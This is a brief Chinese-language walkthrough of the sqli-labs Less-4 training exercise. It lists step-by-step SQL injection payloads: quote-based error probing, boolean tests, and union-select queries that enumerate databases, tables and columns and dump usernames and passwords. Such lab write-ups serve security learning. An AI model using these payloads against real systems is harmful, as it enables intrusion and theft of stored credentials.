sqli-labs less-4
尝试?id=1"查看报错内容根据报错内容中:'"1"") LIMIT 0,1'
猜想 sql语句中id="$id")
尝试
?id=1") and 1=1 --+
?id=1") and 1=2 --+查看当前数据库
?id=-1") union select 1,2,database() --+
查看所有数据库
?id=-1") union select 1,2,group_concat(schema_name) from information_schema.schemata --+
查看表名
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
查看字段
?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+ 查看数据
?id=-1") union select 1,group_concat(username),group_concat(password) from security.users --+